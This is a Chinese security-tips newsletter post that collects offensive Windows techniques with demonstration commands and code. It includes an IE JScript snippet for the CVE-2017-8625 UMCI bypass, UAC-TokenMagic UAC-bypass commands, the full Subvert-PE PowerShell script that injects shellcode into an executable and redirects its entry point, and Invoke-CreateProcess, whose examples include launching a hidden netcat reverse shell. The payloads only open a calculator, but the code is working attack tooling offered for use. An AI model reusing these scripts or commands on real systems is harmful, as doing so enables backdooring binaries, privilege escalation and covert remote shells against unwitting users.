每日安全干货及动态--第二期

enter description here

安全项目

使用Vulhub一键搭建漏洞测试靶场
https://vulhub.org/#/index/

CVE-2017-11882
https://github.com/unamer/CVE-2017-11882/

1.Forfiles ( 弹计算器)

forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe

https://technet.microsoft.com/zh-cn/library/cc753551(v=ws.10).aspx

enter description here

演示如图：

enter description here

2.CVE-2017-8625 -HTML-IE

<html> 
<body> 
<script type="text/jscript">
var r =new ActiveXObject("Wscript.shell").Run("calc.exe"); 
</script>
</body>
</html>

使用CVE-2017-8625 – 绕过设备保护UMCI

https://msitpros.com/?p=3909

enter description here

https://enigma0x3.net/2017/08/24/umci-vs-internet-explorer-exploring-cve-2017-8625/?utm_campaign=crowdfire&utm_content=crowdfire&utm_medium=social&utm_source=twitter#238993254-tw#1503674775121

enter description here

演示如图：

enter description here

3.UAC-TokenMagic.ps1绕UAC

https://github.com/FuzzySecurity/PowerShell-Suite

参考：

https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-1.html
https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-2.html
https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-3.html

.EXAMPLE C:\PS> UAC-TokenMagic -BinPath C:\Windows\System32\cmd.exe .
EXAMPLE C:\PS> UAC-TokenMagic -BinPath C:\Windows\System32\cmd.exe -Args "/c ca
lc.exe" -ProcPID 1116
C:\PS> UAC-TokenMagic -BinPath C:\Windows\System32\cmd.exe  -ProcPID 3624

如图所示：

enter description here

4.Subvert-PE-shellcode- (Powershell 弹计算器)

http://www.fuzzysecurity.com/scripts/18.html

Code

function Subvert-PE {
<#
.SYNOPSIS
    Inject shellcode into a PE image while retaining the PE functionality.
  Author: Ruben Boonen (@FuzzySec)
    License: BSD 3-Clause
    Required Dependencies: None
    Optional Dependencies: None
  
.DESCRIPTION
  Parse a PE image, inject shellcode at the end of the code section and dynamically patch the entry point. After the shellcode executes, program execution is handed back over to the legitimate PE entry point.
  
.PARAMETER Path
    Path to portable executable.
  
.PARAMETER Write
    Inject shellcode and overwrite the PE. If omitted simply display "Entry Point", "Preferred Image Base" and dump the memory at the null-byte location.
.EXAMPLE
    C:\PS> Subvert-PE -Path C:\Path\To\PE.exe
  
.EXAMPLE
    C:\PS> Subvert-PE -Path C:\Path\To\PE.exe -Write
.LINK
  http://www.fuzzysecurity.com/
#>
  param (
        [Parameter(Mandatory = $True)]
    [string]$Path,
    [parameter(parametersetname="Write")]
    [switch]$Write
  )  
    # Read File bytes
    $bytes = [System.IO.File]::ReadAllBytes($Path)
    
    New-Variable -Option Constant -Name Magic -Value @{
            "010b" =  "PE32"
            "020b" =  "PE32+"
    }
    
    # Function courtesy of @mattifestation
    function Local:ConvertTo-Int{
        Param(
            [Parameter(Position = 1, Mandatory = $True)]
            [Byte[]]
            $array)
        switch ($array.Length){
            # Convert to WORD & DWORD
            2 { Write-Output ( [UInt16] ('0x{0}' -f (($array | % {$_.ToString('X2')}) -join '')) ) }
            4 { Write-Output (  [Int32] ('0x{0}' -f (($array | % {$_.ToString('X2')}) -join '')) ) }
        }
    }
    
    # Offsets for calculations
    $PE = ConvertTo-Int $bytes[63..60]
    $NumOfPESection = ConvertTo-Int $bytes[($PE+7)..($PE+6)]
    $OptSize = ConvertTo-Int $bytes[($PE+21)..($PE+20)]
    $Opt = $PE + 24
    $SecTbl = $Opt + $OptSize
    
    # Entry point offset
    $EntryPointOffset = '{0:X8}' -f (ConvertTo-Int $bytes[($Opt+19)..($Opt+16)])
  # Duplicate for calculating JMP later
  $EntryPointBefore = ConvertTo-Int $bytes[($Opt+19)..($Opt+16)]
  echo "`nLegitimate Entry Point Offset:   0x$EntryPointOffset"
    
    # PE magic number
    $MagicVal = $Magic[('{0:X4}' -f (ConvertTo-Int $bytes[($Opt+1)..($Opt+0)]))]
    # Preferred ImageBase, based on $MagicVal --> PE32 (DWORD), PE32+ (QWORD)
    If($MagicVal -eq "PE32"){
        $ImageBase = '{0:X8}' -f (ConvertTo-Int $bytes[($Opt+31)..($Opt+28)])
    
    }
    ElseIf($MagicVal -eq "PE32+"){
        $QWORD = ( [UInt64] ('0x{0}' -f ((($bytes[($Opt+30)..($Opt+24)]) | % {$_.ToString('X2')}) -join '')) )
        $ImageBase = '{0:X16}' -f $QWORD
    }
    
    # Preferred Image Base
    echo "Preferred PE Image Base:         0x$ImageBase"
    
    # Grab "Virtual Size" and "Virtual Address" for the CODE section.
    $SecVirtualSize = ConvertTo-Int $bytes[($SecTbl+11)..($SecTbl+8)]
    $SecVirtualAddress = ConvertTo-Int $bytes[($SecTbl+15)..($SecTbl+12)]
    
    # Precise start of CODE null-byte section!
    $NullCount = '{0:X8}' -f ($SecVirtualSize + $SecVirtualAddress)
  
  # Offset in PE is different [$SecVirtualSize + $SecVirtualAddress - ($SecVirtualAddress - $SecPTRRawData)]
  $SecPTRRawData = ConvertTo-Int $bytes[($SecTbl+23)..($SecTbl+20)]
  $ShellCodeWrite = ($SecVirtualSize + $SecVirtualAddress - ($SecVirtualAddress - $SecPTRRawData))
  
  # Hexdump of null-byte padding (before)
  echo "`nNull-Byte Padding dump:"
  $output = ""
  foreach ( $count in $bytes[($ShellCodeWrite - 1)..($ShellCodeWrite+504)] ) {
    if (($output.length%32) -eq 0){
      $output += "`n"
    }
    else{
      $output += "{0:X2} " -f $count
    }
  } echo "$output`n"
  
    # If -Write flag is set
  if($Write){
    
        # Set shellcode variable based on PE architecture
        If($MagicVal -eq "PE32"){
            # 32-bit Universal WinExe (+ restore registers) --> calc (by SkyLined)
            # Size: 76 bytes
            $ShellCode = @(0x60,0x31,0xD2,0x52,0x68,0x63,0x61,0x6C,0x63,
            0x54,0x59,0x52,0x51,0x64,0x8B,0x72,0x30,0x8B,0x76,0x0C,0x8B,
            0x76,0x0C,0xAD,0x8B,0x30,0x8B,0x7E,0x18,0x8B,0x5F,0x3C,0x8B,
            0x5C,0x1F,0x78,0x8B,0x74,0x1F,0x20,0x01,0xFE,0x8B,0x54,0x1F,
            0x24,0x0F,0xB7,0x2C,0x17,0x42,0x42,0xAD,0x81,0x3C,0x07,0x57,
            0x69,0x6E,0x45,0x75,0xF0,0x8B,0x74,0x1F,0x1C,0x01,0xFE,0x03,
            0x3C,0xAE,0xFF,0xD7,0x58,0x58,0x61)
        }
        ElseIf($MagicVal -eq "PE32+"){
            # 64-bit Universal WinExe (+ restore registers) --> calc (by SkyLined)
            # Size: 97 bytes
            $ShellCode = @(0x53,0x56,0x57,0x55,0x6A,0x60,0x5A,0x68,0x63,
            0x61,0x6C,0x63,0x54,0x59,0x48,0x29,0xD4,0x65,0x48,0x8B,0x32,
            0x48,0x8B,0x76,0x18,0x48,0x8B,0x76,0x10,0x48,0xAD,0x48,0x8B,
            0x30,0x48,0x8B,0x7E,0x30,0x03,0x57,0x3C,0x8B,0x5C,0x17,0x28,
            0x8B,0x74,0x1F,0x20,0x48,0x01,0xFE,0x8B,0x54,0x1F,0x24,0x0F,
            0xB7,0x2C,0x17,0x8D,0x52,0x02,0xAD,0x81,0x3C,0x07,0x57,0x69,
            0x6E,0x45,0x75,0xEF,0x8B,0x74,0x1F,0x1C,0x48,0x01,0xFE,0x8B,
            0x34,0xAE,0x48,0x01,0xF7,0x99,0xFF,0xD7,0x48,0x83,0xC4,0x68,
            0x5D,0x5F,0x5E,0x5B)
        }
        
        # Inject all the things!
        for($i=0; $i -lt $ShellCode.Length; $i++){
            $bytes[($ShellCodeWrite + $i)] = $ShellCode[$i]
        }
        
        # Set new Entry Point Offset --> $NullCount
        $bytes[($Opt+19)] = [byte]('0x' + $NullCount.Substring(0,2))
        $bytes[($Opt+18)] = [byte]('0x' + $NullCount.Substring(2,2))
        $bytes[($Opt+17)] = [byte]('0x' + $NullCount.Substring(4,2))
        $bytes[($Opt+16)] = [byte]('0x' + $NullCount.Substring(6,2))
        
        # Modified Entry Point
        $EntryPointOffset = '{0:X8}' -f (ConvertTo-Int $bytes[($Opt+19)..($Opt+16)])
        echo "Modified Entry Point Offset:     0x$EntryPointOffset"
        
        # Calculate & append farJMP
        $Distance = '{0:x}' -f ($EntryPointBefore - (ConvertTo-Int $bytes[($Opt+19)..($Opt+16)]) - $ShellCode.Length - 5)
        echo "Inject Far JMP:                  0xe9$Distance"
        $bytes[($ShellCodeWrite + $ShellCode.Length)] = 0xE9
        $bytes[($ShellCodeWrite + $ShellCode.Length + 1)] = [byte]('0x' + $Distance.Substring(6,2))
        $bytes[($ShellCodeWrite + $ShellCode.Length + 2)] = [byte]('0x' + $Distance.Substring(4,2))
        $bytes[($ShellCodeWrite + $ShellCode.Length + 3)] = [byte]('0x' + $Distance.Substring(2,2))
        $bytes[($ShellCodeWrite + $ShellCode.Length + 4)] = [byte]('0x' + $Distance.Substring(0,2))
        
        # Hexdump of null-byte padding (after)
        echo "`nNull-Byte Padding After:"
        $output = ""
        foreach ( $count in $bytes[($ShellCodeWrite - 1)..($ShellCodeWrite+504)] ) {
            if (($output.length%32) -eq 0){
                $output += "`n"
            }
            else{
                $output += "{0:X2} " -f $count
            }
        } echo "$output`n"
    
        [System.IO.File]::WriteAllBytes($Path, $bytes)
    }
}

视频演示：

5.Invoke-CreateProcess (Powershell 弹计算器)

Code

function Invoke-CreateProcess {
<#
.SYNOPSIS
     -Binary            Full path of the module to be executed.
                       
     -Args              Arguments to pass to the module, e.g. "/c calc.exe". Defaults
                        to $null if not specified.
                       
     -CreationFlags     Process creation flags:
                          0x00000000 (NONE)
                          0x00000001 (DEBUG_PROCESS)
                          0x00000002 (DEBUG_ONLY_THIS_PROCESS)
                          0x00000004 (CREATE_SUSPENDED)
                          0x00000008 (DETACHED_PROCESS)
                          0x00000010 (CREATE_NEW_CONSOLE)
                          0x00000200 (CREATE_NEW_PROCESS_GROUP)
                          0x00000400 (CREATE_UNICODE_ENVIRONMENT)
                          0x00000800 (CREATE_SEPARATE_WOW_VDM)
                          0x00001000 (CREATE_SHARED_WOW_VDM)
                          0x00040000 (CREATE_PROTECTED_PROCESS)
                          0x00080000 (EXTENDED_STARTUPINFO_PRESENT)
                          0x01000000 (CREATE_BREAKAWAY_FROM_JOB)
                          0x02000000 (CREATE_PRESERVE_CODE_AUTHZ_LEVEL)
                          0x04000000 (CREATE_DEFAULT_ERROR_MODE)
                          0x08000000 (CREATE_NO_WINDOW)
                        
     -ShowWindow        Window display flags:
                          0x0000 (SW_HIDE)
                          0x0001 (SW_SHOWNORMAL)
                          0x0001 (SW_NORMAL)
                          0x0002 (SW_SHOWMINIMIZED)
                          0x0003 (SW_SHOWMAXIMIZED)
                          0x0003 (SW_MAXIMIZE)
                          0x0004 (SW_SHOWNOACTIVATE)
                          0x0005 (SW_SHOW)
                          0x0006 (SW_MINIMIZE)
                          0x0007 (SW_SHOWMINNOACTIVE)
                          0x0008 (SW_SHOWNA)
                          0x0009 (SW_RESTORE)
                          0x000A (SW_SHOWDEFAULT)
                          0x000B (SW_FORCEMINIMIZE)
                          0x000B (SW_MAX)
              
     -StartF            Bitfield to influence window creation:
                          0x00000001 (STARTF_USESHOWWINDOW)
                          0x00000002 (STARTF_USESIZE)
                          0x00000004 (STARTF_USEPOSITION)
                          0x00000008 (STARTF_USECOUNTCHARS)
                          0x00000010 (STARTF_USEFILLATTRIBUTE)
                          0x00000020 (STARTF_RUNFULLSCREEN)
                          0x00000040 (STARTF_FORCEONFEEDBACK)
                          0x00000080 (STARTF_FORCEOFFFEEDBACK)
                          0x00000100 (STARTF_USESTDHANDLES)
.DESCRIPTION
  Author: Ruben Boonen (@FuzzySec)
  License: BSD 3-Clause
  Required Dependencies: None
  Optional Dependencies: None
.EXAMPLE
  Start calc with NONE/SW_SHOWNORMAL/STARTF_USESHOWWINDOW
  C:\PS> Invoke-CreateProcess -Binary C:\Windows\System32\calc.exe -CreationFlags 0x0 -ShowWindow 0x1 -StartF 0x1
  
.EXAMPLE
  Start nc reverse shell with CREATE_NO_WINDOW/SW_HIDE/STARTF_USESHOWWINDOW
  C:\PS> Invoke-CreateProcess -Binary C:\Some\Path\nc.exe -Args "-nv 127.0.0.1 9988 -e C:\Windows\System32\cmd.exe" -CreationFlags 0x8000000 -ShowWindow 0x0 -StartF 0x1
#>
  param (
        [Parameter(Mandatory = $True)]
    [string]$Binary,
        [Parameter(Mandatory = $False)]
    [string]$Args=$null,
        [Parameter(Mandatory = $True)]
    [Int]$CreationFlags,
        [Parameter(Mandatory = $True)]
    [Int]$ShowWindow,
        [Parameter(Mandatory = $True)]
    [Int]$StartF
  )  
    # Define all the structures for CreateProcess
  Add-Type -TypeDefinition @"
  using System;
  using System.Diagnostics;
  using System.Runtime.InteropServices;
  
  [StructLayout(LayoutKind.Sequential)]
  public struct PROCESS_INFORMATION
  {
    public IntPtr hProcess;
        public IntPtr hThread;
        public uint dwProcessId;
        public uint dwThreadId;
  }
  
  [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
  public struct STARTUPINFO
  {
    public uint cb;
        public string lpReserved;
        public string lpDesktop;
        public string lpTitle;
    public uint dwX;
        public uint dwY;
        public uint dwXSize;
        public uint dwYSize;
        public uint dwXCountChars;
    public uint dwYCountChars;
        public uint dwFillAttribute;
        public uint dwFlags;
        public short wShowWindow;
    public short cbReserved2;
        public IntPtr lpReserved2;
        public IntPtr hStdInput;
        public IntPtr hStdOutput;
    public IntPtr hStdError;
  }
  
  [StructLayout(LayoutKind.Sequential)]
  public struct SECURITY_ATTRIBUTES
  {
    public int length;
        public IntPtr lpSecurityDescriptor;
        public bool bInheritHandle;
  }
  
  public static class Kernel32
  {
    [DllImport("kernel32.dll", SetLastError=true)]
    public static extern bool CreateProcess(
      string lpApplicationName,
            string lpCommandLine,
            ref SECURITY_ATTRIBUTES lpProcessAttributes, 
      ref SECURITY_ATTRIBUTES lpThreadAttributes,
            bool bInheritHandles,
            uint dwCreationFlags, 
      IntPtr lpEnvironment,
            string lpCurrentDirectory,
            ref STARTUPINFO lpStartupInfo, 
      out PROCESS_INFORMATION lpProcessInformation);
  }
"@
  
  # StartupInfo Struct
  $StartupInfo = New-Object STARTUPINFO
  $StartupInfo.dwFlags = $StartF # StartupInfo.dwFlag
  $StartupInfo.wShowWindow = $ShowWindow # StartupInfo.ShowWindow
  $StartupInfo.cb = [System.Runtime.InteropServices.Marshal]::SizeOf($StartupInfo) # Struct Size
  
  # ProcessInfo Struct
  $ProcessInfo = New-Object PROCESS_INFORMATION
  
  # SECURITY_ATTRIBUTES Struct (Process & Thread)
  $SecAttr = New-Object SECURITY_ATTRIBUTES
  $SecAttr.Length = [System.Runtime.InteropServices.Marshal]::SizeOf($SecAttr)
  
  # CreateProcess --> lpCurrentDirectory
  $GetCurrentPath = (Get-Item -Path ".\" -Verbose).FullName
  
  # Call CreateProcess
  [Kernel32]::CreateProcess($Binary, $Args, [ref] $SecAttr, [ref] $SecAttr, $false, $CreationFlags, [IntPtr]::Zero, $GetCurrentPath, [ref] $StartupInfo, [ref] $ProcessInfo) |out-null
  
  echo "`nProcess Information:"
  Get-Process -Id $ProcessInfo.dwProcessId |ft
}